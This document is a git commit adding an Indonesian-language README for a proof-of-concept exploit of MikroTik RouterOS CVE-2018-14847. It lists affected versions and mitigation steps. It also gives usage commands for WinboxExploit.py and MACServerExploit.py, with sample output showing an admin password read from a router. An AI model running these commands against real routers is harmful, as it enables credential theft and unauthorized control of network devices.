Create README.md

sinichi449 · web-flow · commit 417679e2031d · 2019-09-29T19:42:49.000+07:00
diff --git a/README.md b/README.md
@@ -0,0 +1,84 @@
+# Mikrotik Login Exploit
+PoC (Proof of Concept) dari vulnerability mikrotik CVE-2018-14847 (terutama pada winbox), memiliki cara kerja membaca password langsung dari RouterOS pada port default 8291.
+
+Original by: https://github.com/BigNerd95/
+
+## Requirements
+- Python 3+
+
+### Instalasi pada Linux
+```
+apt install python3
+```
+
+
+## Contoh Penggunaan
+
+#### WinBox (TCP/IP)
+```
+python3 WinboxExploit.py <IP-ADDRESS> [PORT]
+```
+e.g:
+```
+$ python3 WinboxExploit.py 192.168.1.1
+Connected to 192.168.1.1:8291
+Exploit successful
+User: admin
+Pass: oppaidaisuki123
+```
+
+#### Menggunakan MAC Address  
+Anda bisa menggunakan script ini walau tanpa IP address.
+
+Gunakan MACServerDiscovery.py untuk scan router.
+```
+python3 MACServerDiscover.py
+```
+e.g:
+```
+$ python3 MACServerDiscover.py
+Looking for Mikrotik devices (MAC servers)
+
+    aa:bb:cc:dd:ee:ff 
+
+    aa:bb:cc:dd:ee:aa
+```
+
+Exploitasi:
+```
+python3 MACServerExploit.py <MAC-ADDRESS>
+```
+e.g:
+```
+$ python3 MACServerExploit.py aa:bb:cc:dd:ee:ff
+
+User: admin
+Pass: oppaidaisuki123
+```
+
+## Vulnerable Versions
+RouterOS keluaran 2015-05-28 s/d 2018-04-20
+
+RouterOS versions:
+
+- Longterm: 6.30.1 - 6.40.7
+- Stable: 6.29 - 6.42
+- Beta: 6.29rc1 - 6.43rc3
+
+Info selengkapnya : https://blog.mikrotik.com/security/winbox-vulnerability.html
+
+## Pencegahan Exploit
+- Upgrade RouterOS ke 6.42+
+- Nonaktifkan Winbox
+- Blok service:
+```
+/ip service set winbox address=10.0.0.0/8,172.16.0.0/12,192.168.0.0/16
+```
+- Filter Rules (ACL), blok port 8291:
+```
+/ip firewall filter add chain=input in-interface=wan protocol=tcp dst-port=8291 action=drop
+```
+- Batasi akses login winbox dari MAC Adress:
+```
+/tool mac-server mac-winbox
+```
